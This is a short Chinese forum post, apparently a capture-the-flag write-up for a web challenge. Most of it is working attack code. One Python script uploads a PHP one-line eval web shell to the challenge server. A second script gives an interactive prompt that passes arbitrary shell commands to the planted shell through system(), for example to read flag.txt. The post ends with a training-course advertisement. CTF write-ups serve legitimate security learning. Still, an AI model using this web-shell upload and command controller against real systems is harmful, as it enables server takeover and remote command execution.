-
-
[原创]第八题 牛刀小试
-
发表于:
2020-4-30 17:06
4924
-
不会php,不会web题
上网查的,现学现卖,东抄抄西抄抄就有下面的脚本了
https://www.cnblogs.com/tr1ple/p/11301743.html
然后改吧改吧就是下面的这种
import json
url="http://47.102.223.17:2333/index.php"
data1 = {"a":"<?php eval(@$_POST['a']); ?>"}
data2 = json.dumps(data1)
data=data2
files=[('file',('over.php',data))]
print requests.post(url=url,files=files).content貌似网上的菜刀不好用,自己瞎写个脚本
# -*- coding=utf-8 -*-
import string
import requests
url='http://47.102.223.17:2333/upload/2086490076.php'
#username=admin&password=admin
def post(mys,data):
#data={"username":"admin","password":"123456"}
res = mys.post(url, data=data).content
return res
def exp():
mys=requests.session()
data={"a":"echo system(\"ls -l\");echo system(\"cat flag.txt\");"}
while 1:
cmd=raw_input('$:')
data={"a":"echo system(\""+cmd+"\");"}
ret=post(mys,data)
get=ret.decode('gbk', "ignore")
print get
#print ret
get=ret.decode('gbk', "ignore")
print get
if __name__=="__main__":
exp()全靠ccfer带躺
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2020-4-30 17:15
被大帅锅编辑
,原因:
